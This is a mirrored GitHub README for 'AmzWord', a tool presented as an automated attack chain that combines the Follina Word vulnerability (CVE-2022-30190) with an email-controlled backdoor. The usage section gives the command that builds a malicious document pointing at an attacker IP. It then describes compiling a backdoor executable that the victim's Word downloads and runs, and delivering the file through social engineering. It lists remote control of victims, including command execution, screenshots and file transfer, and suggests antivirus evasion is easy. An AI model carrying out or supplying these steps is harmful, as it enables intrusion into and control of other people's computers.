Giter Club home page Giter Club logo

amzword's Introduction

AmzWord

an automated attack chain based on CVE-2022-30190, 163 email backdoor, and image steganography

Thanks to the following github repository, we referenced and modified part of the code to integrate and implement our work:

中文README请看这里

Requirements

gdog:

  • Python 2.7
  • PyCrypto module
  • WMI module
  • Enum34 module
  • Netifaces module

follina:

  • Python 3.x

Usage & attack process

  1. Use follina.py to build a malicious word file and turn on http listening

    • You can change the default name and default ip in the code
    • You can also use --ip and --output to specify
    • Please refer to follina for detailed usage. We have not changed the usage interface.
    • eg: python follina.py --ip 100.100.100.100 --output maldoc.doc

  2. Modify client.py and gdog.py under gdog and fill in the following information

    gmail_user = 'your email'
gmail_pwd = 'your pwd'
server = "smtp server"
imap_server = 'imap server'

  3. Compile client.py into tar.exe and place it under /follina/www

  4. Use any social engineering method to send it to the target. As long as the victim opens word, tar.exe will be automatically downloaded and executed.

  5. The attacker runs gdog locally and sends commands to control the target machine. For usage, see gdog

Remark

  1. This is just a demo of the attack chain implementation. The running exe can even be found in the task manager, which makes it easy to observe the effect. We did not perform any operations such as anti-virus, hiding, and privilege escalation. Of course, these are not difficult on Windows, right?
  2. The gdog project has been around for a long time, and we have spent a lot of effort to make it run successfully. The remote control commands that are currently confirmed include: executing commands, taking screenshots, pop-up windows, shutting down, locking the screen, and transferring files. These functions Sufficient to suit most needs.
  3. I don’t know why, but there seems to be some problem with imap’s SUBJECT search. We cannot search for emails with the target subject, and the return value is empty. We can only take other methods, such as reading all unread emails, filtering out the targets, and then setting others as unread. This may cause problems when there are many controlled users and needs to be solved.
  4. This project is only for learning and exchange purposes.

amzword's People

Contributors

tecitomous avatar jump-wang-111 avatar luckyxyhaha avatar

Stargazers

avatar

Watchers

avatar

Forkers

tecitomous luckyxyhaha

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.